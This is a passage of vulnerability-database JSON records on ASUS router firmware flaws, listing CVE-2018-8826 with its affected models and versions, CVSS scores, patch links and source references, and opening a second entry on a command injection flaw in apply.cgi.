            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.380.10446"
          },
          {
            "model": "rt-ac55u",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.382.50276"
          },
          {
            "model": "rt-ac1750",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-n12 d1",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-n600",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.380.10446"
          },
          {
            "model": "rt-ac86u",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.384.20648"
          },
          {
            "model": "rt-ac2900",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.384.20648"
          },
          {
            "model": "rt-ac52u b1",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.380.10446"
          },
          {
            "model": "rt-ac55uhp",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.382.50276"
          },
          {
            "model": "rt-acrh13",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-ac51u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-ac58u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-ac1200",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.380.10446"
          },
          {
            "model": "rt-ac1750",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-ac2900",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.384.20648"
          },
          {
            "model": "rt-ac51u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-ac52u b1",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.380.10446"
          },
          {
            "model": "rt-ac55u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.382.50276"
          },
          {
            "model": "rt-ac55uhp",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.382.50276"
          },
          {
            "model": "rt-ac58u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-ac66u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-ac86u",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.384.20648"
          },
          {
            "model": "rt-acrh13",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-n12 d1",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-n600",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.380.10446"
          },
          {
            "model": "rt-ac1750",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-n12 d1",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-acrh13",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-ac66u",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-ac58u",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-ac51u",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.380.8228"
          },
          {
            "model": "rt-ac52u b1",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.380.10446"
          },
          {
            "model": "rt-ac1200",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.380.10446"
          },
          {
            "model": "rt-n600",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.380.10446"
          },
          {
            "model": "rt-ac55u",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.382.50276"
          },
          {
            "model": "rt-ac55uhp",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.382.50276"
          },
          {
            "model": "rt-ac2900",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.384.20648"
          },
          {
            "model": "rt-ac86u",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.384.20648"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09806"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004414"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-1316"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-8826"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac1200_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac1750_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac2900_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac51u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac52u_b1_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac55u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac55uhp_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac58u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac86u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-acrh13_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n12_d1_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n600_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004414"
          }
        ]
      },
      "cve": "CVE-2018-8826",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-8826",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-09806",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-138858",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-8826",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-8826",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-8826",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-09806",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201804-1316",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-138858",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09806"
          },
          {
            "db": "VULHUB",
            "id": "VHN-138858"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004414"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-1316"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-8826"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13, and RT-N12 D1 routers with firmware before 3.0.0.4.380.8228; RT-AC52U B1, RT-AC1200 and RT-N600 routers with firmware before 3.0.0.4.380.10446; RT-AC55U and RT-AC55UHP routers with firmware before 3.0.0.4.382.50276; RT-AC86U and RT-AC2900 routers with firmware before 3.0.0.4.384.20648; and possibly other RT-series routers allow remote attackers to execute arbitrary code via unspecified vectors. plural ASUS Router product firmware contains a vulnerability related to input validation.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUSRT-AC51U and others are router products of ASUS. There are security vulnerabilities in several ASUS products. A remote attacker can exploit this vulnerability to execute arbitrary code. The following products are affected: ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13, RT-N12 D1 (using firmware earlier than 3.0.0.4.380.8228); RT-AC52U B1, RT-AC1200 , RT-N600 (use the previous version 3.0.0.4.380.10446 firmware); RT-AC55U, RT-AC55UHP (use the previous version 3.0.0.4.382.50276 firmware); RT-AC86U, RT-AC2900 (use the previous version 3.0. version 0.4.384.20648 firmware)",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-8826"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004414"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-09806"
          },
          {
            "db": "VULHUB",
            "id": "VHN-138858"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-8826",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004414",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-1316",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-09806",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-138858",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09806"
          },
          {
            "db": "VULHUB",
            "id": "VHN-138858"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004414"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-1316"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-8826"
          }
        ]
      },
      "id": "VAR-201804-1564",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09806"
          },
          {
            "db": "VULHUB",
            "id": "VHN-138858"
          }
        ],
        "trust": 1.3063388469230768
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09806"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:41:51.846000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "RT-AC55U",
            "trust": 0.8,
            "url": "https://www.asus.com/us/supportonly/RT-AC55U/HelpDesk_BIOS/"
          },
          {
            "title": "RT-AC1200",
            "trust": 0.8,
            "url": "https://www.asus.com/us/Networking/RT-AC1200/HelpDesk_BIOS/"
          },
          {
            "title": "RT-AC55UHP",
            "trust": 0.8,
            "url": "https://www.asus.com/us/supportonly/RT-AC55UHP/HelpDesk_BIOS/"
          },
          {
            "title": "RT-AC1750",
            "trust": 0.8,
            "url": "https://www.asus.com/us/Networking/RT-AC1750/HelpDesk_BIOS/"
          },
          {
            "title": "RT-AC66U",
            "trust": 0.8,
            "url": "https://www.asus.com/us/Networking/RTAC66U/HelpDesk_BIOS/"
          },
          {
            "title": "RT-AC86U",
            "trust": 0.8,
            "url": "https://www.asus.com/us/Networking/RT-AC86U/HelpDesk_BIOS/"
          },
          {
            "title": "RT-ACRH13",
            "trust": 0.8,
            "url": "https://www.asus.com/us/Networking/RT-ACRH13/HelpDesk_BIOS/"
          },
          {
            "title": "RT-N600",
            "trust": 0.8,
            "url": "https://www.asus.com/ca-en/Networking/RT-N600/HelpDesk_Download/"
          },
          {
            "title": "RT-N12_D1",
            "trust": 0.8,
            "url": "https://www.asus.com/us/Networking/RTN12_D1/HelpDesk_BIOS/"
          },
          {
            "title": "RT-AC2900",
            "trust": 0.8,
            "url": "https://www.asus.com/Networking/RT-AC2900/HelpDesk_BIOS/"
          },
          {
            "title": "RT-N66W",
            "trust": 0.8,
            "url": "https://www.asus.com/us/Networking/RTN66W/HelpDesk_BIOS/"
          },
          {
            "title": "RT-AC52U-B1",
            "trust": 0.8,
            "url": "https://www.asus.com/Networking/RT-AC52U-B1/HelpDesk_BIOS/"
          },
          {
            "title": "RT-AC51U",
            "trust": 0.8,
            "url": "https://www.asus.com/us/supportonly/RT-AC51U/HelpDesk_BIOS/"
          },
          {
            "title": "RT-AC58U",
            "trust": 0.8,
            "url": "https://www.asus.com/sg/Networking/RT-AC58U/HelpDesk_BIOS/"
          },
          {
            "title": "Patches for arbitrary code execution vulnerabilities for multiple ASUS products",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/129599"
          },
          {
            "title": "Multiple ASUS Product security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79610"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09806"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004414"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-1316"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-20",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-138858"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004414"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-8826"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://www.asus.com/networking/rt-ac2900/helpdesk_bios/"
          },
          {
            "trust": 1.7,
            "url": "https://www.asus.com/networking/rt-ac52u-b1/helpdesk_bios/"
          },
          {
            "trust": 1.7,
            "url": "https://www.asus.com/ca-en/networking/rt-n600/helpdesk_download/"
          },
          {
            "trust": 1.7,
            "url": "https://www.asus.com/sg/networking/rt-ac58u/helpdesk_bios/"
          },
          {
            "trust": 1.7,
            "url": "https://www.asus.com/us/networking/rt-ac1200/helpdesk_bios/"
          },
          {
            "trust": 1.7,
            "url": "https://www.asus.com/us/networking/rt-ac1750/helpdesk_bios/"
          },
          {
            "trust": 1.7,
            "url": "https://www.asus.com/us/networking/rt-ac86u/helpdesk_bios/"
          },
          {
            "trust": 1.7,
            "url": "https://www.asus.com/us/networking/rt-acrh13/helpdesk_bios/"
          },
          {
            "trust": 1.7,
            "url": "https://www.asus.com/us/networking/rtac66u/helpdesk_bios/"
          },
          {
            "trust": 1.7,
            "url": "https://www.asus.com/us/networking/rtn12_d1/helpdesk_bios/"
          },
          {
            "trust": 1.7,
            "url": "https://www.asus.com/us/networking/rtn66w/helpdesk_bios/"
          },
          {
            "trust": 1.7,
            "url": "https://www.asus.com/us/supportonly/rt-ac51u/helpdesk_bios/"
          },
          {
            "trust": 1.7,
            "url": "https://www.asus.com/us/supportonly/rt-ac55u/helpdesk_bios/"
          },
          {
            "trust": 1.7,
            "url": "https://www.asus.com/us/supportonly/rt-ac55uhp/helpdesk_bios/"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-8826"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-8826"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09806"
          },
          {
            "db": "VULHUB",
            "id": "VHN-138858"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004414"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-1316"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-8826"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-09806"
          },
          {
            "db": "VULHUB",
            "id": "VHN-138858"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004414"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-1316"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-8826"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-05-18T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-09806"
          },
          {
            "date": "2018-04-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-138858"
          },
          {
            "date": "2018-06-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-004414"
          },
          {
            "date": "2018-04-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201804-1316"
          },
          {
            "date": "2018-04-20T20:29:00.583000",
            "db": "NVD",
            "id": "CVE-2018-8826"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-05-18T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-09806"
          },
          {
            "date": "2018-05-24T00:00:00",
            "db": "VULHUB",
            "id": "VHN-138858"
          },
          {
            "date": "2018-06-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-004414"
          },
          {
            "date": "2018-04-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201804-1316"
          },
          {
            "date": "2024-11-21T04:14:23.937000",
            "db": "NVD",
            "id": "CVE-2018-8826"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-1316"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  ASUS Vulnerability related to input validation in router product firmware",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004414"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "input validation",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-1316"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201804-1341

    Vulnerability from variot - Updated: 2024-11-23 22:06

    Main_Analysis_Content.asp in /apply.cgi on ASUS RT-AC66U, RT-AC68U, RT-AC86U, RT-AC88U, RT-AC1900, RT-AC2900, and RT-AC3100 devices before 3.0.0.4.384_10007; RT-N18U devices before 3.0.0.4.382.39935; RT-AC87U and RT-AC3200 devices before 3.0.0.4.382.50010; and RT-AC5300 devices before 3.0.0.4.384.20287 allows OS command injection via the pingCNT and destIP fields of the SystemCmd variable. plural ASUS The product includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUS RT-AC66U, etc. are all wireless router products of ASUS. Attackers can use the percent and desktOP fields of the System Cmd variable to inject this vulnerability and execute operating system commands with higher authority. The following products and versions are affected: ASUS RT-AC66U; RT-AC68U; RT-AC86U; RT-AC88U; RT-AC1900; .382.39935 prior; RT-AC87U and RT-AC3200 prior to 3.0.0.4.382.50010; RT-AC5300 prior to 3.0.0.4.384.20287

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201804-1341",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rt-n18u",
            "scope": "lt",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.382.39935"
          },
          {
            "model": "rt-ac87u",
            "scope": "lt",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.382.50010"
          },
          {
            "model": "rt-ac3200",
            "scope": "lt",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.382.50010"
          },
          {
            "model": "rt-ac5300",
            "scope": "lt",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4.384.20287"
          },
          {
            "model": "rt-ac86u",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.384.10007"
          },
          {
            "model": "rt-ac68u",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.384.10007"
          },
          {
            "model": "rt-ac2900",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.384.10007"
          },
          {
            "model": "rt-ac3100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.384.10007"
          },
          {
            "model": "rt-ac88u",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.384.10007"
          },
          {
            "model": "rt-ac1900",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.384.10007"
          },
          {
            "model": "rt-ac66u",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.384.10007"
          },
          {
            "model": "rt-ac1900",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-ac2900",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-ac3100",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-ac3200",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-ac5300",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-ac66u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-ac68u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-ac86u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-ac87u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-ac88u",
            "scope": null,
            "trust": 0.8,
